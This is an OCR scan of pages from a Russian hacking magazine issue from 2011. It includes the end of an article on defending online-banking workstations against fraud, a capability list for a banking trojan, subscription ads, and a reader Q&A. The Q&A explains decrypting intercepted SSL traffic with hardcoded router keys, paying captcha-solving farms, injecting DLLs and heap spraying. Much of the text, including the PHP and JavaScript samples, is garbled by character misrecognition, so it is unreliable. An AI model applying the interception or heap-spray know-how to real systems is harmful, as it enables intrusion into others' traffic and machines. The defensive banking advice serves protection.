деньги работодателя от неправомерных посягательств третьих лиц. 
Прежде всего стоит разобраться, какие средства защиты имеются 
в самой системе ДБО, и как их можно использовать. Часто клиенты 
банков даже не знают о возможности контроля доступа к системе 
ДБО по ІР-адресам или о об использовании токенов для хранения 
ключей ЭЦП. Другой проблемой является нежелание клиента 
платить за дополнительные средства обеспечения безопасности, 
так как у него нет понимания степени критичности риска мошенни- 
чества. При возможности выбора банка стоит отдать предпочтение 
той кредитной организации, которая предлагает своим клиентам 



безопасный сервис по работе с системой ДБО: средства надежного 
хранения ключей, одноразовые пароли, систему противодействия 
мошенничеству, встроенную в ДБО. 

В любом случае, необходимо понимать, что наличие средств 
защиты на стороне банка не гарантирует абсолютной безопаснос- 
ти. Наш опыт показывает, что в 80% случаев причиной инцидента 
является несоблюдение требований безопасности на стороне 
клиента банка. 

При организации рабочего места, на котором будут работать 
с системой «Банк-Клиент» или «Интернет-банк», необходимо 
предусмотреть возможные пути компрометации данных автори- 
зации и обеспечить их надежную защиту. Идеальным вариантом 
является выделенная рабочая станция, предназначенная исклю- 
чительно для работы с банком. На ней необходимо ограничить 
сетевые взаимодействия списком ІР-адресов и доменных имен 
доверенных узлов: сервер ДБО банка, корпоративный сервер 1С, 
сайт Центрального банка, сервер налоговой инспекции. Данная 
машина должна иметь обновленный антивирус и установленные 
обновления безопасности программного обеспечения. Если нет 
возможности выделить под цели ДБО физическую машину, то 
можно использовать виртуальную. 

Не забывайте про организационные меры, которые в большинстве 
случаев являются намного эффективнее технических мер. Необ- 
ходимо регулярно менять пароли во всех системах, предоставлять 
пользователю только необходимые для работы права, уделять 
внимание хранению ключей ЭЦП, иметь отработанные процедуры 
реагирования на инциденты. Наличие хорошо отлаженных схем 
своевременной реакции на происшествия позволит снизить ущерб 
в случае мошенничества и предотвратить хищение. Своевременное 
выявление факта преступления и оперативное реагирование в тече- 
ние 4 часов с момента отправки платежного поручения гарантируют 
возврат денежных средств на счет в 80% случаев. 

Наиболее яркими признаками готовящегося мошенничества явля- 
ются: 

• нестабильное функционирование ПК, на котором работают с сис- 
темой ДБО (медленная работа, произвольная перезагрузка, другие 
неполадки); 

• выход из строя ПК, на котором работают с ДБО; 

• перебои с доступом в систему ДБО; 

• невозможность авторизации в системе ДБО; 

• ППоЗ-атака на вашу ИТ-инфраструктуру; 

• несоответствие порядковых номеров платежных поручений; 
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Консоль управления ботнетом 

• попытки авторизации в ДБО с других ІР-адресов или в нерабочее 
время. 

В случае обнаружения факта мошенничества необходимо макси- 
мально быстро сообщить о происшествии в банк с целью остановки 
платежа и блокирования доступа к системе ДБО со скомпрометиро- 
ванными ключами и паролем. Также следует немедленно обесто- 
чить ПК, с которого предположительно были похищены ключи и 
данные для авторизации в системе ДБО, и обеспечить неизменность 
его состояния до приезда правоохранительных органов. Если в ком- 
пании имеется межсетевой экран или прокси-сервер, на котором 
ведутся логи, то необходимо произвести их сохранение на непере- 
записываемый носитель информации. В случае самостоятельного 
расследования или привлечения для этих целей консультантов не 
допускается работа с оригиналами носителей информации, так 
как это может повредить целостности доказательств, хранящихся 
на них. Оригиналы носителей необходимо опечатать и поместить 
в сейф, а также оформить данные действия протоколом изъятия и 
скрепить его подписями свидетелей и исполнителя. Обязательно на- 



Алгоритм действий при на- 
ступлении инцидента в ДБО 



1. Ограничить доступ кобъектам, задействованным в инциденте. 

2. Написать служебную записку от имени сотрудника пострадав- 
шей компании на имя генерального директора о факте возникно- 
вения инцидента. 

3. Привлечь компетентных специалистов для консультации. 

4. Обеспечить сохранность доказательств: 

• отключение от сети питания; 

• снятие энергозависимой информации с работающей системы; 

• сбор информации о протекающем в реальном времени инци- 
денте; 

5. В присутствии третьей независимой стороны произвести 
изъятие и опечатывание носителей информации с доказательной 
базой 

• Задокументировать изъятие Актом. 

• Составить детальную опись объектов с информацией и их источ- 
ников. 

• Задокументировать процесс на видеокамеру. 

• Хранить опечатанные объекты вместе с актом в надежном месте 
до передачи носителей на исследование или правоохранитель- 
ным органам. 

6. При проведении исследования обеспечить неизменность дока- 
зательств. Работать с копией. 

7. При обращении в правоохранительные органы представить им 
подробное описание инцидента, описание собранных доказа- 
тельств и результаты их анализа. 




Команды для бота 



пишите заявление о произошедшем в милицию. По возможности до- 
полните заявление результатами самостоятельного расследования 
инцидента. Эта информация поможет быстрее принять решение о 
возбуждении уголовного дела. Даже если мошенничество не было 
завершено, и вы успели остановить его, инцидент остается уголов- 
ным преступлением, которое попадает под ряд статей, начиная от 
создания и распространения вредоносного программного обеспе- 
чения и заканчивая попыткой хищения в особо крупном размере. 
Дежурный в отделении милиции обязан принять и зарегистриро- 
вать ваше заявление. 

Заключение 

Осознание реальности угрозы является серьезным побуждением к 
действию. Применение простых, но эффективных мер по снижению 
рисков мошенничества поможет обезопасить личные сбережения и де- 
нежные средства на счету работодателя. Уже один день работы специ- 
алиста по информационной безопасности позволит создать защищен- 
ную среду для работы с системой ДБО. Учитывая, что средний ущерб от 
мошенничества составляет порядка 2 млн рублей, то эти минимальные 
затраты являются отличными инвестициями, ц-ц 



Функционал вредоносного 
программного обеспечения 
\Л/іп32/$ру.5Ы2.ЫАІ. 



• Детектирует и обходит все общеизвестные антивирусы и межсе- 
тевые экраны; 

• включаети настраиваетТегтіпаІЗегѵісез (РЭР); 

• загружает и устанавливает в скрытом режиме ОрепЗЗБ; 

• создаетучетные записи ѴѴіпсІоѵѵз для своих пользователей; 

• получает доступ установленным браузерам; 

• крадет пользовательские данные; 

• работаете СгурІоАРІ. 

Целевые приложения: 

ДБО «В5-С1іеп1»; 

ДБО «іВапк»; 

СКЗИ «Бикрипт-КСБ-С»/ДБО «Ракіига»; 

ДБО «Инист»; 

ЭПС ѴѴеЬМопеу; 

ДБО НапбуВапк; 

ДБО«РФК»; 

СКЗИ «Агава»/ДБ0 «ІпІегВапк»; 

ДБО «ІпІег-РРО»; 

ДБО РайффайзенБанк; 

ДБО Альфабанк; 
покерные клиенты. 
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6 номеров 564 руб. 
13 номеров 1105 руб. 




6 номеров 810 руб. 
12 номеров 1470 руб. 



6 номеров 785 руб. 
12 номеров 1420 руб. 



6 номеров 1110 руб. 
12 номеров 2016 руб. 









6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 



6 номеров 1 260 руб. 
12 номеров 2310 руб. 



6 номеров 900 руб. 
12 номеров 1720 руб. 



6 номеров 1300 руб. 
1 2 номеров 2300 руб. 



ПОДПИШИСЬ! 

зНор.дІс.ги 



ВЫГОДА + ГАРАНТИЯ 

Редакционная подписка без посредников - это 
гарантия получения важного для Вас журнала и 
экономия до 40% от розничной цены в киоске 

8 - 800 - 200 - 3-999 




□ІЮ 









6 номеров 1130 руб. 
1 2 номеров 2060 руб. 



6 номеров 890 руб. 
12 номеров 1630 руб. 



6 номеров 630 руб. 
12 номеров 1130 руб. 



6 номеров 765 руб. 
12 номеров 1380 руб. 







6 номеров 960 руб. 
12 номеров 1740 руб. 



6 номеров 1 300 руб. 
1 2 номеров 2300 руб. 



3 номера 630 руб. 

6 номеров 1140 руб. 



6 номеров 1 260 руб. 
1 2 номеров 2200 руб. 




6 номеров 2205 руб. 
1 2 номеров 3890 руб. 



6 номеров 21 50 руб. 
1 2 номеров 3930 руб. 



6 номеров 2178 руб. 
1 2 номеров 3960 руб. 



(дате)іаіиі 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 















УЫІТЗ 



■ ■ Антон «Ап*» Жуков апЫзІеггадтаіІ.сот, Степан «51ер» Ильин Іѵѵіиег.сот/зіераЬ 




Есть вопросы — присылай 
на Іад@геаІ.хакер.ги 



О: Скажи, как оперативно проверить 
свой софт на наличие уязвимостей, не 
устанавливая никакие дополнитель- 
ные программы? Зачастую поставить 
авер невозможно из-за банального 
отсутствия прав. 

А: В такой ситуации выручат клиентские 
сканеры сііепі-зісіе уязвимостей. Это 
модный тренд, поэтому многие компании, 
специализирующиеся на И Б, сейчас ак- 
тивно разрабатывают подобные решения. 
Основная фишка в том, что от пользователя 
требуется лишь перейти на специальный 
сайт, а устанавливать что-либо в системе 
не нужно. Вот наш список рекомендуемых 
сервисов: 

• БигФаІгоІ [ зигіраігоі.ги ]. Проверка бе- 
зопасности браузера и разных браузерных 
плагинов (ОиіскТі те, Ріа зЬ , Аб обе Реа бег, 

8і Іѵегіід Ы;, 9аѵа и так далее). Если что-то 
из списка устарело, ЭигФаІгоІтутже даст 
знать. 

• Бесипіа Опііпе БоКѵѵаге Іпзресіог 

( зесипіа.сот/ѵиІпегаЬіиіу зсаппіпд/опііпе ]. 
Анализ операционной системы и про- 
грамм на наличие небезопасных версий и 
неустановленных патчей. Онлайн-аналог их 
известной десктопной программы Р5І. 



• Рапсіа АсІіѵеЗсап 2.0 [ рапбазесигііѵ.сопп/ 
Ьотеизегз/зоіиііопз/асііѵезсап ). Реализо- 
ванный через АсІіѵеХ- компонент анти в и рус 
от компании Рапба Бесигііу. 

• СЬеск Ѵоиг Ріидіпз [ плогіЦа.сот/ 

ріид і псЬеск ). Экспресс-проверка безопас- 
ности установленных аддонов для Рі гебох'а . 

О: Пишу приложение для монито- 
ринга, которое в случае проблем 
должно оповещать администратора с 
помощью $М$-сообщения. Нынешняя 
убогая система использует старый 
телефон, подключенный через СОМ- 
порт :). 

А: Самый сбалансированный вариант — 
воспользоваться уже знакомым нам серви- 
сом Сііскаіеіі Виік 5М5 Оаіеѵѵау [ сііскаіеіі. 

сот ). Мы когда-то давно писали о нем, как 
о способе отправки БМБ’ок с произвольным 
именем отправителя (атака «Раке Ю»), Но 
этотБМБ-шлюз непременно пригодится 
не только для баловства. Сервис имеет 
оченьтолковую систему АРІ, позволяющую 
встроить отправку сообщений влюбое 
приложение. Полное описание системы 
представлено на специальной странице для 
разработчиков [ сііскаіеи.сот/сіеѵеіорегз/ 



сііскаіеіі арі.рбр ). но чтобы продемонстри- 
ровать простоту подхода, приведу пример 
сценария на РНР. В основе скрипта лежит 
обращение к НТТР АРІ Сііскаіеіі: 

<? 

// имя пользователя в системе 
$изег = " изег " ; 

// пароль в системе 
$раззѵ\гогб = "раззілгагб" ; 

// идентификатор АРІ 
$арі_іб = "хххх" ; 

$Ьазеиг1 = 

" Ъббр : / /арі . сііскабеіі .сот" ; 

// текст сообщения 

$бехб = игіепсобе ( "Ні ! ТМз із 

аіегб теззаде. Зегѵег іб боѵт! " ) ; 

// номер для отправки 
$бо = "0123456789" ; 

$иг1 = " $Ьазеиг1/1іЦЦр/аиЦ]т?изег 
= $изег&раз зѵ\гогб= $раз зѵ\гагб&арі_ 
іб=$арі_іб" ; 

$геб = 1і1е($иг1); 

$зезз = зрііб ( " : " , $геб [ 0 ] ) ; 
іі ($зезз[0] == "ОК") { 

$зезз_іб = бгіт($зезз[1]); 

$иг! = "$Ьазеиг1/Ы;$:р/ 
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зепітзд?зеззіоп_іі=$зезз_ 
іі&Хо=$Хо&ХехХ=$ХехХ " ; 

$геХ = Хі1е($иг1) ; 

$зепі = зрІіХ ( " : " , $геХ [ 0 ] ) ; 

ІІ ($зепі[0] == "ІО") 

есХю "зиссезз теззаде ІБ: ". 

$ з епі [ 1 ] ; 

еізе 

есХю " зепі теззаде Хаііеі" ; 

} еізе { 

есХю " АиХЪепХісаХіоп Хаііиге: ". 

$геХ [0] ; 
ехіХ ( ) ; 

} 

?> 

Понятно, что аналогичным образом можно 
взаимодействовать с АРІ -систем ой сер- 
виса, разрабатывая приложения налюбом 
другом языке. Ведь фактически общение 
со шлюзом осуществляется через обычные 
НТТР-запросы. Попробовать систему в 
действии можно совершенно бесплатно. 
После регистрации каждый пользователь 
получает кредиты (это внутренняя валюта 
сервиса) для отправки десяти сообщений. 

О: Решил потренироваться в построе- 
нии различных сетей и конфигураций 
сетевого оборудования. Виртуальную 
сеть из десктопных компьютеров 
можно создать в любой программе 
для виртуализации. Но как быть со 
сложными сетевыми устройствами, 
программируемыми роутерами и 
тому подобным? Как, например, мож- 
но подготовиться к сертификации? Ни 
за что не поверю, что единственный 
вариант — это отправиться на доро- 
гостоящие курсы, где в лабораториях 
есть все необходимое оборудование. 
А: Ксчастью, есть программы, позво- 
ляющие проектировать сети различной 
топологии и симулировать их работу. Один 
из самых видных проектов в этой области 
— графический симулятор сети 6М53 ( щ 
пеі). Система поддерживает эмуляцию 
как простых ПК, та ки.кпримеру, марш- 
рутизаторов С ібсо. Ктомуже, в отличие от 
большинства аналогов, прога поддержива- 
ет все команды Сізсо 105, что непременно 
пригодится тебе для сертификации. 

О: Как вручную уменьшить раз- 
мер ^ѵа-скриптов? Есть сценарий, 
который занимает 3 Кб — это много. 
Но пользоваться автоматическими 
упаковщиками не хочу. 

А: Есть несколько действенных приемов, 
которые позволяютуменьшить размер 
іаѵаВсгірІ-сценария. Попробую перечис- 
лить общие рекомендации, объяснив их на 
примерах. Итак: 



1 . Использовать односимвольные названия: 
ѵаг іСоипХег = 0 => 1 = 0 

2. Избегать «дорогих» ключевых слов: 

х=пем Аггау ( ) ; => х= [ ] ; 

ѵХЪіІе ( ) { } , <іо { } вдШе ( ) => Хог ( ) 

И 

х=МаХЪ. . Хіоог (х) ; =>х=х>>0; 
х=МаХЪ . гоипсі (х) ; => х=х- . 5»0 ; 
х=МаХЪ . ром ( 2 , х) ; => х=1<<х; 
х=х/256; =>х=х»8; 

3. Выбрать наиболее эффективную нотацию 
ДЛЯ цифр: 

0x10 => 16 
0x20000 => 1«17 
1000 => ІеЗ 
. 0001 => 1е-4 

4. Оптимизировать Ьг-ЦИКЛЫ: 

Хог (х=0 ; х<50 ; х++ ) { } => 

Хог (х=50 ; х- ; ) { } 

5. Удалить комментарии и ненужные фигур- 
ные скобки, пробелы, точки с запятой: 

Хог (...) { а+=Ъ; с*=а; } => Хог(„.) 
а+=Ъ, с*=а; 

ХипсХіоп () {а+=Ъ;} => ХипсХіоп() 

{ а+=Ь} 

6. Сохранить наиболее часто используемые 
сложные значения в переменные: 

х=<іоситепХ . сгеаХеЕІетепХ (... 

) ; іоситепХ . Ъоіу . аррепісЪ.і1і ( х) ; 

= > <і=с1оситепХ ; х=і . сгеаХеЕІетепХ (... 

) ; сі . Ъоіу . аррепісЫІі (х) ; 
у=х*х*х+х*х-4 ; 2 =х*х*х+х*х+ 5 ; => 
у= ( д=х*х*х+х*х) -4 ; т.=ц+5 ; 

7. Использовать комбинированные опреде- 
ления переменных: 

х=0;у=0; =>х=у=0; 
х=0 ;у= [ 0 ] ; =>у=[х=0]; 

О: А как работают автоматические 
упаковщики 35? 

А: В основе 15-пакеров во многом лежат опи- 
санные выше алгоритмы. Многие из решений 
основываются на том, что в 15-сценарии часто 
одни и те же последовательности символов 
встречаются много раз. Например, 4символа 
1ог() можнозаменить односимвольным экви- 
валентом и серьезно выиграть в размере. Для 
этого, правда, придется хранить словарьзамен, 
чтобы иметь возможность выполнить декоди- 
рование. Допустим, имеется следующий код: 



соіе="о = сіоситепХ . 
сгеаХеЕІетепХ ( 1 а ' ) ; \г\пс!оситепХ . 
Ъоіу . аррепіСЪіІі (о) ; " 

А вот та к он может выглядеть в упакованном 
виде: 

кеуз = "А" 

соіе= " о = АсгеаХеЕІетепХ ( ' а 1 ) ; \г \ 
пАЪоіу . аррепіСЪіІі (о) ;АіоситепХ. " ; 

В этом примере последовательность 
«іоситепі.» заменена символом «А». 
Переменная кеуз содержит список всех 
символов, которые используются для 
замены строк (в нашем случае только «А»), 
В переменной сосіе содержится оригиналь- 
ная строка с выполненными заменами, 
заканчивающаяся используемым ключом 
и строкой для выполнения декодирования. 
Изначальный код может быть легко восста- 
новлен разбиением строки на подстроки, 
если в качестве разделителя использовать 
ключ. В нашем примере разделение будет 
выглядеть следующим образом: 

зиЪ_зХгіпд= [ " о = ", 

" сгеаХеЕІетепХ ( ' а ' ) ; \г\п" , "Ъоіу . 
аррепіСЫІі ( о ) ; " , " іоситепХ . " ] ; 

Удалив последнюю строчку из массива 
и соединив между собой оставшиеся 
подстроки, вставляя текстзамены, декодер 
может восстановить оригинальную строку. 
Это очень эффективный принцип, который 
помогает добиться максимальной степени 
сжатия. Одним из пакеров, которые исполь- 
зуюттакой подход, является 1з5^х [ соіе. 
доодІе.сот/р/]55Ь< ]. 

О: Винда стала постоянно выва- 
ливаться в синий экран смерти. 
Сложность в том, что система сразу 
перезагружается, и я не могу даже 
посмотреть сообщение об ошибке. 
Как быть? 

А: Чтобы увидеть причину сообщения 
В500, надо отключить автоматическую 
перезагрузку при падении системы. Для 
этого переходим «Мой компьютер -> 
Дополнительные параметры системы -> 
Дополнительно -> Загрузка и восстанов- 
ление -> Параметры» и снимаем галку с 
опции «Выполнять автоматическую пере- 
загрузку», после чего Винда уже не будет 
перезагружаться в случае возникновения 
критической ошибки. Могу также пореко- 
мендовать утилиту ВІие5сгеепѴіе\д/ ( пігзоЪ. 

), которая сканирует все іитр-файлы, 
создаваемые во время крэша системы, 
и выводит сообщения об ошибках в виде 
удобной таблицы. 
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О: Есть ли аналог системы Т9 для теле- 
фонов с ОѴѴЕВТѴ-клавиатурой? 

А: Да, такая технология есть и называется 
Бѵѵуре [ зѵѵуреіпс.сопп ]. После установки ты 
получаешь каметод ввода для сенсорного 
экрана, позволяющего печатать слова, не 
отрывая палец оттач-скрина. 

Принцип во многом очень схоже Т9. Для 
угадывания слова Эѵѵуре использует ал- 
горитм исправления ошибок и лингвисти- 
ческую модель языка. Причем это работает 
настолько здорово, что набортекста ускоря- 
ется в разы. Отрывать палец нужно только 
между словами. С официального сайта 
(зѵѵуреіпс.сопп) можно скачать бета-версию 
для платформы АпбгоісІ, правда, поддержки 
русского языка в ней пока нет. 

О: У меня в сети есть роутер, шифру- 
ющий весь трафик при помощи 551.. 
Подскажи, можно ли как-то рас- 
шифровать перехваченный трафик 
пользователей? 

А: Да, можно. Ты, наверное, подумаешь, что 
я знаю какую-то новую уязвимость 55І_. На 
самом деле, ничего нового нет, а проблема 
известна еще с тех времен, когда зарожда- 
лась криптография. Важноетребование для 
надежного шифрования: приватный ключ 
надо хранить в секрете. Проще простого. Но 
курьез в том, что многие сетевые устройства 
используют секретные ключи, которые жес- 
тко внедрены в прошивку. Таким образом, 
чтобы получить заветный ключ, нужно лишь 
отыскать и распотрошить подходящую 
прошивку. Но тут есть небольшая проблем- 
ка:точная версии прошивки наустройстве 
заведомо неизвестна. 

Возьмем, например, сборки ББ-ѴѴРТ: 
для каждого поддерживаемого уст- 
ройства существует несколько версий 
Лгтѵѵаге — микро, обычная, ѴРЫ и так 
далее. Что же теперь, перебирать все 
прошивки вручную? Нет, к счастью, это 
необязательно. Отдичайшего геморроя 
нас избавит проект ЫШеВІаскВох ( собе. 
доодІе.сот/р/ІІЩеЫаскЬох ). представля- 
ющий собой настоящую базу с секретны- 
ми и ассоциированными с ними откры- 
тыми ключами. 

Программе можно передать открытый 
ключ роутера, и она автоматически найдет 
секретный ключ. Или поступить по-другому 
и скормить ЫШеВІаскВох’у дамп перехва- 
ченного трафика пользователей. В этом 
случае программа сама извлечет оттуда 
публичный ключ и уже с его помощью вы- 
полнит поиск по своей базе. 

На текущий момент ЫШеВІаскВох содержит 
сведения о прочти двухтысячахуникальных 
секретных ключей, большая часть которых 
относится кразличным прошивкам ББ- 
ѴѴРТ. Хотя, безусловно, здесь есть ключи и 




для устройств таких известных вендоров, 
как Сізсо, Ыпкзуз, В-І_іпк и Ыеідеаг. Это 
еще увеличивает шансы расшифровать пе- 
рехваченный трафик и даже организовать 
МІТМ-ата ку. 

О: Через мой 5МТР часто пытаются 
отправлять вирусы, спам- и фишин- 
говые сообщения. Это меня расстра- 
ивает :). Подскажи, как реализовать 
антиспам- и антивирусные проверки 
на уровне БМТР-сервера? 

А: Можно попробовать разработку от 
Яндекса — ІЧѵѵБМТР [ діШиЬ.сот/кЬапІоп/ 
ЫѵѵЭМТР ). Это прокси-сервер, который 
работает перед основным почтовым серве- 
ром и может обеспечивать поддержку 55І_, 
фильтрацию по РВИ, антиспам- и анти- 
вирусные проверки. Именно он работает 
сейчас на Яндекс. Почте. Вся настройка осу- 
ществляется через конфиг-файл, который 
хорошо откомментирован. 

О: Использую в своем проекте слож- 
ные капчи, в том числе от сервиса 
геСАРТСНА (доодІе.сот/гесарІсИа), 
но даже это не спасает от фейко- 
вых регистраций ботами. Как им это 
удается? Ведь не вручную же регист- 
рируются? 

А: Если регистраций действительно очень 
много, то заполнение форм явно осущест- 
вляется автоматически. Тут надо понимать, 
что даже самая сложная САРТСНА нынче 
не проблема — их решают самые обыч- 
ные люди. Такие сервисы, как БеСарІсбег 
[ бесарІсЬег.сот ]. связывают между собой 
тех, кто разрабатывает автоматизиро- 
ванные боты, и трудоголиков, которые за 
копейки готовы «решать» капчи тысячами. 
Девелоперам предлагается АРІ для разных 
языков (С/С++, С#, Регі, РНР и РуШоп), с 
помощью которого они заливают на сервер 
капчу и получают ответ с решением, а жела- 
ющим заработать (в основном это китайцы) 
предоставляется простенькая форма для 
решения капчи. Желающих поживиться 
настолько много, чтолюбая капча распоз- 
нается практически мгновенно. 

О: По долгу службы приходится 
часто разрабатывать правила для 
МосЯБесигіТу. Есть ли какой-нибудь 
удобный редактор для этих целей? 

А: Попробуй РЕМО — Риіе ЕсіііоШог 
МосІБесигіІу [ пеШеа.сот/ст5/?д=геппо ). 

Это графический редактор для управления 
правилами, который поможетегенери- 
ровать ѵѵЫіеІізІ корректных запросов для 
твоего веб-приложения. Даже хорошо 
разбираясь в синтаксисе для составления 
правил, конфигурировать МосІЭесигіІу 
гораздо приятнее и быстрее именно с помо- 



щью таких графических помощников. РЕМО 
написаннаРибуи легко устанавливается 
на любой сервер, где есть интерпретатор 
Р и Ьу версии 1 .8 или выше. 

О: Можно ли запустить процесс с пос- 
тоянно включенной системой ОЕР без 
возможности отключения? 

А: Напомню, что ВЕР (Оаіа ЕхесіЛіоп 
Ргеѵепііоп) — это функция безопасности, 
встроенная в семейство операционных 
систем ѴѴіпсІоѵѵз, которая не позволяет 
приложению исполнять код из облас- 
ти памяти, помеченной как«только 
для данных». Короткий ответ на твой 
вопрос: «Да, можно». Для этого потре- 
буется специальная ВІ_І_-библиотека — 
ЕШогсеРегплапепШЕР [ Ыод.сІісІіег5Іеѵеп5. 
сот/201 0/1 1/08/еШогсеретпапепШер ). 
Будучи загруженной внутрь процесса, 
эта ОН вызывает ЭеіРгосеззОЕРРоІісу с 
аргументом РР0СЕ55_ВЕР_ЕМАВІ_Е, тем 
сам активируя для приложения функцию 
Б ЕР. После этого отключить защиту уже 
нельзя. 

О: Тогда следующий вопрос: а как под- 
грузить нужную ЭИ внутрь процесса? 

А: Для этого есть разные техники. Ты мо- 
жешь добавить библиотеку и нужную фун- 
кцию в таблицу импорта. Не ясно? Сейчас 
объясню. Любая программа имееттакой 
список ОБЕек, которые нужны ей для 
корректного выполнения. Чтобы добавить 
в этот списоктребуемую Б І_І_- библиотеку, 
понадобится редактор РЕ-файлов, напри- 
мер, БогеРЕ [ ѵѵоосІппапп.пеі/соиаЬогаІіѵе/ 
Іоо[з/іпс1ех.рІ"ір/1_огс1РЕ ). Запускаем прогу, 
жмем на кнопку <РЕ ЕсШог> и выбираем 
нужный исполняемый файл. В следующем 
окне, где будут отображаться парамет- 
ры РЕ-файла, нажми на <БігесШгіез> и 
кликни на кнопку <...> напротив Ітрогі 
ІаЫе. Теперь перед тобой находится таб- 
лица импорта со списком подгружаемых 
ВІ_І_-библиотек. Если вызвать контекс- 
тное меню и выбрать пункт АсИ ітрогі:, 
то можно указать новую ББЕку, а также 
функции, которые необходимо импорти- 
ровать. После этого остается только со- 
хранить изменения, и дело можно считать 
сделанным. 

Еще один вариант — воспользовать- 
ся специальными утилитами вроде 
БоасіОЕЕѴіаАррІпіІ ( Ыод.сіісііегзіеѵепз. 
сот/201 0/1 0/26/и рсІаіе-ІоасІсІЦѵіаарріпіі ). В 
конфиге проги необходимо прописать имя 
процесса и через точку сзапятой имена 
всех ВІ_І_-библиотек, которые требуется 
импортировать. Например, так: 

асгогс!32 . ехе Лоок-сгеаРергосезз . ЛИ ; 

ЕпНгсеРегтапепкБЕР . ЛИ 
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СтасІБ 

\л/\л/\л/.тасІпеіпате/іооІ5/тасІ$$ 

©Для выявления структуры сайта мы часто используем различные 
инструменты, но при этом забываем, что в большинстве случаев до 
нас эту работу сделали индексирующие роботы Соодіе’а. Паук поиско- 
вой машины заглядывает в такие места, куда обычному смертному не 
добраться. Сервис СтасІЗ, в свою очередь, использует кропотливость 
поисковика и пытается вытащить максимум информации о сайте из 
базы Гугла. Дальше строится полное дерево структуры сайта. За считан- 
ные секунды. Крометого, сканер выводитзапрещенные к индексиро- 
ванию директории ресурса, отображаетсписоксайтов, которыетакже 
размещены на этом хосте (РеѵегзеІР), и собирает некоторую служебную 
информацию о сервере. 





— ■ ■ і — 
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Для реализации Неар 
Зргауіпд 




Сооггу 

ѵѵѵѵѵѵ.аооггу.сот 

О Как сделать комментарий для любой страницы? Скажем, работа- 
ешь ты с командой людей над некоторым проектом и видишь ошибку 
на сайте. Вместо того, чтобы пытаться объяснить суть бага словами 
или делать скриншот, можно воспользоваться метаинтернет-сер- 
висом. Выглядит это так. Для любой страницы, в любом месте ты мо- 
жешь наклеить стикер с текстом. Например, «Тут ошибка, исправь, 
пожалуйста!» или «Вот здесь немешалобы вставить блок с таким-то 
содержанием». Предметно и прицельно :). И все, кто пользуется 
этим сервисом, смогут увидеть комментарии. Использовать это тем 
более удобно за счеттого, что Сооггу интегрируется в браузер в 
виде плагина. 







рртИ нц* і ■■» 




•н к- ыіш. в *м ішисі 
Е>ПІ ІгуКТіСП кш-*т 



Сканеры безопасности 
онлайн 



Неар зргау депегаіог НаскегТагдеі 

Ьіі.Іу/зтаІІ Ьеар зргау депегаіог \лм\лЩаскег1агде1.сот 



©В прошлом году мы не разупоминали прием Неар Зргауіпд, который 
используется многими сплоитами. Его можно эксплуатировать для 
удаленного исполнения кода, когда уязвимая программа (например, ІЕ) 
по какой-то причине обращается к несуществующему участку памяти, 
находящемуся в адресном пространстве кучи. Мы можем заполнить кучу 
одинаковыми блоками, состоящими из последовательности ІЧОР-команд 
(отсутствие операции] и шелл-кода. Если переход будет выполнен на один 
изтаких ЫОР’ов.то выполнение будет «скользить» по цепочке ІЧОРдотех 
пор, пока не наткнется на машинную команду, выполняющую некоторое 
действие. А поскольку после каждой цепочки ЫОР’а у нас стоит шелл-код, 
то именно он и будет выполняться! Неар Зргауіпд реализуется с помощью 
Таѵа-скрипта, который можно сгенерировать как раз с помощью этого 
сервиса. 



© Во времена, когда многие известные приложения мигрируют в об- 
лако и предоставляются в качестве сервиса, нет ничего удивительного 
в появлении сіоисі- ресурса с хакерскими утилитами. НаскегТагдеі: 

— это настоящий кладезь известных х-іооіг, которые размещены на 
мощном кластере серверов и могут быть использованы любым жела- 
ющим. 

Бесплатный набор впечатляет: это сканеры Ытар, ОрепѴаз, ЗОИіХ, 
здітар, КШо, ^отіа ЗесигТу Зсап, ЗиЬ Ботаіп Зсаппег и некоторые 
ЕпдегргіпЕпд-утилиты. 

Для использования вообще не нужно никакой установки: просто введи 
параметры сканирования, валидный е-таіІ(ящикна бесплатных сер- 
висах не прокатит], и отчет о результатах сканирования придет ктебе в 
ближайшее время. 



► 128 



ХАКЕР 02 (145) 201 1 







ФОКУС-ГРУППА 




Хочешь не только читать журнал, но и вместе с нами делать его лучше? Ука- 
зать на наши фейл ы или выразить респект за сделанную работу? Зто легко. 
Вступай в ряды нашей фокус-группы и выигрывай класные подарки отжур- 
нала и наших партнеров. 



3 самых активныхучастника фокус-группы получат в этом месяце подписки 
на журнал Хакер: за первое место - на 12 месяцев, за второе - на 6 месяцев 
и за третье- на 3 месяца. 



РЕКЛАМА 



